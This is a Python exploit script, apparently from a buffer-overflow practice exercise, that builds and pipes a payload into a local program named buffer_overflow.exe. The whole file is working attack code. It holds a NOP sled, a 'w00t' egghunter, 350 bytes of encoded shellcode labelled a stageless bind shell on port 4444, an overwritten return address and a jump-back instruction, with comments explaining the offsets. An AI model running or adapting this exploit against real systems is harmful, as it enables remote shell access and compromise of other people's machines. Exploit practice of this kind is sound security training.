Bind_Stageless_Shell_4444.py

  1. #! python
  2.  
  3. import os  # not used anywhere below
  4. import sys  # not used anywhere below
  5. import subprocess
  6. import binascii  # only referenced by the commented-out print near the end
  7. import time  # not used anywhere below
  8. import struct  # not used anywhere below; struct.pack("<I", ...) would be the usual way to build ESP_Address
  9.  
  10.  
  11.  
  12. #Convert (77C35459) to Little Endian
  13. ESP_Address = "\x59\x54\xc3\x77"  # the four bytes of 0x77C35459 in little-endian order
  14.  
  15.  
  16. Offset_EIP = 1020  # index in the payload at which ESP_Address is placed (see the length arithmetic below)
  17.  
  18. #egg (w00t)
  19. egg = "\x77\x30\x30\x74"  # ASCII "w00t"; the same 4 bytes are embedded in the egghunter string below
  20. #egghunter NtAccessCheck (AndAuditAlarm) - 32 Bytes
  21. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" +\
  22. "\x77\x30\x30\x74" + \
  23. "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  24.  
  25. #Stageless Shell Bad Chars '\x00\x0a\x1a' Shellcode size is 350 Bytes
  26. shellcode = ""
  27. shellcode += "\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
  28. shellcode += "\xb1\xd0\xb9\x59\x83\xeb\xfc\xe2\xf4\x4d\x38\x3b\x59"
  29. shellcode += "\xb1\xd0\xd9\xd0\x54\xe1\x79\x3d\x3a\x80\x89\xd2\xe3"
  30. shellcode += "\xdc\x32\x0b\xa5\x5b\xcb\x71\xbe\x67\xf3\x7f\x80\x2f"
  31. shellcode += "\x15\x65\xd0\xac\xbb\x75\x91\x11\x76\x54\xb0\x17\x5b"
  32. shellcode += "\xab\xe3\x87\x32\x0b\xa1\x5b\xf3\x65\x3a\x9c\xa8\x21"
  33. shellcode += "\x52\x98\xb8\x88\xe0\x5b\xe0\x79\xb0\x03\x32\x10\xa9"
  34. shellcode += "\x33\x83\x10\x3a\xe4\x32\x58\x67\xe1\x46\xf5\x70\x1f"
  35. shellcode += "\xb4\x58\x76\xe8\x59\x2c\x47\xd3\xc4\xa1\x8a\xad\x9d"
  36. shellcode += "\x2c\x55\x88\x32\x01\x95\xd1\x6a\x3f\x3a\xdc\xf2\xd2"
  37. shellcode += "\xe9\xcc\xb8\x8a\x3a\xd4\x32\x58\x61\x59\xfd\x7d\x95"
  38. shellcode += "\x8b\xe2\x38\xe8\x8a\xe8\xa6\x51\x8f\xe6\x03\x3a\xc2"
  39. shellcode += "\x52\xd4\xec\xb8\x8a\x6b\xb1\xd0\xd1\x2e\xc2\xe2\xe6"
  40. shellcode += "\x0d\xd9\x9c\xce\x7f\xb6\x2f\x6c\xe1\x21\xd1\xb9\x59"
  41. shellcode += "\x98\x14\xed\x09\xd9\xf9\x39\x32\xb1\x2f\x6c\x33\xb9"
  42. shellcode += "\x89\xe9\xbb\x4c\x90\xe9\x19\xe1\xb8\x53\x56\x6e\x30"
  43. shellcode += "\x46\x8c\x26\xb8\xbb\x59\xa0\x8c\x30\xbf\xdb\xc0\xef"
  44. shellcode += "\x0e\xd9\x12\x62\x6e\xd6\x2f\x6c\x0e\xd9\x67\x50\x61"
  45. shellcode += "\x4e\x2f\x6c\x0e\xd9\xa4\x55\x62\x50\x2f\x6c\x0e\x26"
  46. shellcode += "\xb8\xcc\x37\xfc\xb1\x46\x8c\xd9\xb3\xd4\x3d\xb1\x59"
  47. shellcode += "\x5a\x0e\xe6\x87\x88\xaf\xdb\xc2\xe0\x0f\x53\x2d\xdf"
  48. shellcode += "\x9e\xf5\xf4\x85\x58\xb0\x5d\xfd\x7d\xa1\x16\xb9\x1d"
  49. shellcode += "\xe5\x80\xef\x0f\xe7\x96\xef\x17\xe7\x86\xea\x0f\xd9"
  50. shellcode += "\xa9\x75\x66\x37\x2f\x6c\xd0\x51\x9e\xef\x1f\x4e\xe0"
  51. shellcode += "\xd1\x51\x36\xcd\xd9\xa6\x64\x6b\x49\xec\x13\x86\xd1"
  52. shellcode += "\xff\x24\x6d\x24\xa6\x64\xec\xbf\x25\xbb\x50\x42\xb9"
  53. shellcode += "\xc4\xd5\x02\x1e\xa2\xa2\xd6\x33\xb1\x83\x46\x8c"
  54.  
  55. Dummy_Data = ('\x41' * 200)  # 200 bytes of "A"
  56. NoOpSled_ToEggHunter = ('\x90' * (Offset_EIP - 5 - (len(Dummy_Data) + len(egg) + len(egg) + len(shellcode) + len(egghunter))))  # filler sized so that the parts before the five "\x41" bytes total Offset_EIP - 5; note a negative count here would silently yield an empty string
  57.  
  58. #Jumps back -60 Btyes
  59. JmpBack = "\xeb\xc4"
  60.  
  61. final_payload = Dummy_Data + egg + egg + shellcode + NoOpSled_ToEggHunter + egghunter + "\x41" * 5 + ESP_Address + JmpBack  # built as a str; every "\xNN" is a code point < 256
  62. final_payload_bytes = final_payload.encode('raw_unicode_escape')  # for code points < 256 this codec behaves like latin-1, so each "\xNN" becomes exactly one byte
  63.  
  64. print(hex(final_payload_bytes[1020]))  # sanity check: shows the byte that landed at index Offset_EIP (indexing bytes yields an int, so this is Python 3)
  65. #print(hex(binascii.unhexlify(final_payload[0])))
  66. p = subprocess.Popen('buffer_overflow.exe', stdin=subprocess.PIPE) #NOTE: no shell=True here
  67. p.stdin.write(final_payload_bytes)  # the whole payload is handed to the local binary over its stdin pipe
  68. p.communicate()[0]  # waits for exit; stdout was not captured, so the discarded [0] is None. communicate() also closes stdin in CPython
  69. p.stdin.close()  # presumably redundant after communicate() (closing an already-closed pipe is a no-op) — harmless